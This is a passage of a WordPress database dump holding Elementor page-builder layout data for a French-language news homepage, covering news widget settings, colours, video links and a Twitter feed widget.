cal\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Guin\\u00e9e innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1474,502,'_elementor_version','0.4'),(1475,502,'_elementor_css','a:3:{s:4:\"time\";i:1508924072;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1477,503,'_elementor_edit_mode','builder');
INSERT INTO `wpstg0_postmeta` VALUES (1478,503,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\